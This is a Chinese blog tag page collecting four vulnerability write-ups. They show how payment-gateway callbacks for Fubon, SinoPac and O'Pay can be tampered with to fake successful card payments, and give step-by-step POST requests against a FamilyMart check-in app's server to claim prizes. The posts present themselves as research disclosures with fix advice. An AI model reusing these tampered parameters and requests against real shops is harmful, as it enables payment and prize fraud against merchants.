Tag: 安全漏洞

(中文) [安全漏洞][案例#004][WEB]富邦網路特店收單[信用卡](台北富邦銀行)

案例#4

富邦網路特店收單(信用卡)

Yang 聲明

此為研究案例,目的在於讓各位了解 APP 開發時嚴謹性及需要注意資安的重要。

請勿直接使用此文章方法。

購物付款流程

首先先介紹整個購物付款流程

流程請參考 [安全漏洞][案例#002][WEB]歐付寶金流整合(信用卡)

漏洞檢視:

1 透過 client 端裝置(瀏覽器)進行資料傳送。駭客可以攔截修改這些轉址時所夾帶的內容。

當透過富邦信用卡平台完成交易後,銀行端會透過我們的瀏覽器傳回資料到商家網站

網址如下:

http://mywebsite.com?MERCHANTID=xxxxxxx&TERMINALID=xxxxxx&ORDERID=xxxxx&

TRANSAMT=5000&TRANSMODE=0&TRANSDATE=20170926&TRANSTIME=203900&
RESPONSECODE=0&RESPONSEMSG=&APPROVECODE=12345&SYSORDERID=12345&
BATCHNO=123456&TRANSCODE=00

2 僅需修改紅字部分。

將 TRANSAMT改為正確金額,RESPONSECODE改為0然後送出後,可以讓「購物網站」以為真的有付款成功

修改前購物車結果

螢幕快照 2017-09-28 上午9.50.15

修改後購物車結果:

螢幕快照 2017-09-28 上午9.51.09

作者早先有致電富邦反應此問題,但他們的回覆是做法不會修改。建議是事後去富邦後台查詢是否真的有入帳,或是透過查詢交易明細的API查詢。

如果有其他網物商店需要串接富邦,建議不要直接拿回傳的結果當作成功交易的依據,這是會有風險的

Tags :

(中文) [安全漏洞][案例#003][WEB]網易收金流整合[信用卡](永豐銀行)

案例#3

網易收金流整合(信用卡)

Yang 聲明

此為研究案例,目的在於讓各位了解 APP 開發時嚴謹性及需要注意資安的重要。

請勿直接使用此文章方法。

購物付款流程

首先先介紹整個購物付款流程

流程請參考 [安全漏洞][案例#002][WEB]歐付寶金流整合(信用卡)

漏洞檢視:

1 透過 client 端裝置(瀏覽器)進行資料傳送。駭客可以攔截修改這些轉址時所夾帶的內容。

當透過永豐信用卡平台完成交易後,銀行端會透過我們的瀏覽器傳回資料到商家網站

網址如下:

http://mywebsite.com?OrderNO=L1600107&ShopNO=AA0090&

KeyNum=3&TSNO=AA00900001068&
PayType=C&Amount=47000&
Status=F&
Description=S00000&
Digest=a23a8dcc322183e965e35ea86d0168f6ab
&Param1=1&Param2=0000000000&Param3=
2 僅需修改紅字部分。

將 Status=F 改為 Status=S 然後送出後,可以讓「購物網站」以為真的有付款成功

修改前購物車結果

%e8%9e%a2%e5%b9%95%e5%bf%ab%e7%85%a7-2016-12-25-%e4%b8%8a%e5%8d%8810-31-36

修改後購物車結果:

%e8%9e%a2%e5%b9%95%e5%bf%ab%e7%85%a7-2016-12-25-%e4%b8%8a%e5%8d%8810-31-27

雖然永豐有想到資料竄改問題,而提出 digest 驗證機制

%e8%9e%a2%e5%b9%95%e5%bf%ab%e7%85%a7-2016-12-25-%e4%b8%8a%e5%8d%8810-34-38

但是商店透過此驗證機制產生出來的結果,居然跟夾帶於網址內的 digest 是相同的。

但永豐並沒有把 Status=F 這部分加在驗證公式裡面,導致我們還是可以竄改資料 ORZ。。。

2016-12-28 更新

與永豐回報此問題後,永豐很快地在 12/28  patch 掉此問題。在金融業這樣的效率算是很高。

Tags :

(中文) [安全漏洞][案例#002][WEB]歐付寶金流整合(信用卡)

案例#2

歐付寶金流整合(信用卡)

Yang 聲明

此為研究案例,目的在於讓各位了解 APP 開發時嚴謹性及需要注意資安的重要。

請勿直接使用此文章方法。

購物付款流程

首先先介紹整個購物付款流程

螢幕快照 2016-09-04 上午8.51.21

問題:

由上圖可以看到步驟 (2) 與 (5) ,會透過瀏覽器端,將資料送出去。

步驟 (2) 部分封包內容:

MerchantID=…&TotalAmount=1000&MerchantTradeNo=7558619&…

紅字部分分別為:付款金額,訂單號碼

步驟 (5) 部分封包內容:

MerchantID=…&MerchantTradeNo=7558619&PayAmt=1000&…

漏洞檢視:

1 透過 client 端裝置(瀏覽器)進行資料傳送。駭客可以攔截修改這些轉址時所夾帶的內容。

2 僅需修改紅字部分。

透過步驟(2)可以讓「歐付寶」使用修改過的金額進行刷卡動作。

透過步驟(5)可以讓「購物網站」以為真的有付款成功

如果「購物網站」本身程式不夠嚴謹,很有可能在這個步驟就會出問題了。

Tags :

(中文) [安全漏洞][案例#001][APP]全家好禮籤到

案例#1

全家好禮籤到 APP

Yang 聲明

此為研究案例,目的在於讓各位了解 APP 開發時嚴謹性及需要注意資安的重要。

請勿直接使用此文章方法產生出來的序號進行兌獎動作。

事先準備

首先使用 Chrome 安裝 Advanced REST client plugin,之後操作均會透過此 plugin 進行

步驟1

使用不同的 deviceId 產生出新的 deviceUid

URL http://www.tropox.com:8080/FamilyBeacon/Services/Identify
POST
User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; iOpus-I-M; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
deviceId a3603f1c3dcd704c
deviceType 2
application/x-www-form-urlencoded

fami01fami01_1

步驟2 – 簽到

簽到產生checkinId

URL http://www.tropox.com:8080/FamilyBeacon/Services/CheckIn
POST
User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; iOpus-I-M; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
deviceUid 6ce2b05a-4b53-471c-ab30-3a0185379875
storeid 1
beaconid 0118a6d9c3e-f7f9-415e-aff9-03fb7d9b2427

fami02 fami02_2

步驟3 – 獲得禮物

使用不同的 deviceId 產生出新的 deviceUid。

正常要收集10組不同 checkId 才能獲得金獎,但這邊工程師可能偷懶,即便同一組重複使用10次也可以過關。

URL http://www.tropox.com:8080/FamilyBeacon/Services/LotoryScratchCard
POST
User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; iOpus-I-M; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
deviceUid 6ce2b05a-4b53-471c-ab30-3a0185379875
checkInId 前面取得的checkInId逗點隔開,總共重複十次
ver 2
application/x-www-form-urlencoded

fami_03 fami03_1

漏洞檢視:

1 網路封包未使用 https 或其他方式進行加密。

2 deviceUid 產生方式太不嚴謹,可以透過任意 deviceId 產生出 deviceUid

3 checkinId 產生方式太不嚴謹,beaconId 產生方式太過規律容易複製。

4 沒有針對異常網路操作進行阻擋

Tags :